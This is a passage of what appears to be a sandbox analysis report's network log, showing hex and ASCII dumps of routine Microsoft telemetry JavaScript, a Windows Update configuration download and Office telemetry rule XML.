                                                                                                                                                                                                        2024-12-02 06:38:20 UTC16384INData Raw: 63 6f 6e 66 69 67 2e 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73
                                                                                                                                                                                                        Data Ascii: config.coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._s
                                                                                                                                                                                                        2024-12-02 06:38:20 UTC16384INData Raw: 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74
                                                                                                                                                                                                        Data Ascii: e)return!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t
                                                                                                                                                                                                        2024-12-02 06:38:20 UTC16384INData Raw: 67 3d 22 57 65 62 41 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22
                                                                                                                                                                                                        Data Ascii: g="WebAuthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split"
                                                                                                                                                                                                        2024-12-02 06:38:20 UTC16384INData Raw: 61 28 65 5b 6d 76 5d 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f
                                                                                                                                                                                                        Data Ascii: a(e[mv])),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        15192.168.2.8497474.245.163.56443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:21 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=MWU5ENCar6voP1d&MD=YsvgaaP4 HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                        Host: slscr.update.microsoft.com
                                                                                                                                                                                                        2024-12-02 06:38:21 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                        ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                        MS-CorrelationId: 0d7fcd29-a9d7-4f67-9d7a-589bcd7af143
                                                                                                                                                                                                        MS-RequestId: 5f0297d9-15fd-4e22-96ba-bfda2eab0292
                                                                                                                                                                                                        MS-CV: zLvAgqCvWEinL0D/.0
                                                                                                                                                                                                        X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:21 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 30005
                                                                                                                                                                                                        2024-12-02 06:38:21 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                        Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                        2024-12-02 06:38:21 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                        Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        16192.168.2.84981913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:40 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:40 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:40 GMT
                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                        Content-Length: 218853
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public
                                                                                                                                                                                                        Last-Modified: Fri, 29 Nov 2024 23:15:49 GMT
                                                                                                                                                                                                        ETag: "0x8DD10CBC2E3B852"
                                                                                                                                                                                                        x-ms-request-id: 82d9e4b2-501e-007b-3a87-435ba2000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063840Z-174f78459685726chC1EWRsnbg000000146g000000001aht
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:40 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                        Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                        2024-12-02 06:38:40 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                        Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                        2024-12-02 06:38:40 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                        Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                        2024-12-02 06:38:40 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                        Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                        2024-12-02 06:38:40 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                        Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                        2024-12-02 06:38:40 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                        Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                        2024-12-02 06:38:41 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                        Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                        2024-12-02 06:38:41 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                        Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                        2024-12-02 06:38:41 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                        2024-12-02 06:38:41 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        17192.168.2.84982313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:43 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:43 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:43 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 2160
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                        x-ms-request-id: d2130280-a01e-006f-03c7-4313cd000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063843Z-174f78459685726chC1EWRsnbg0000001450000000003rzx
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
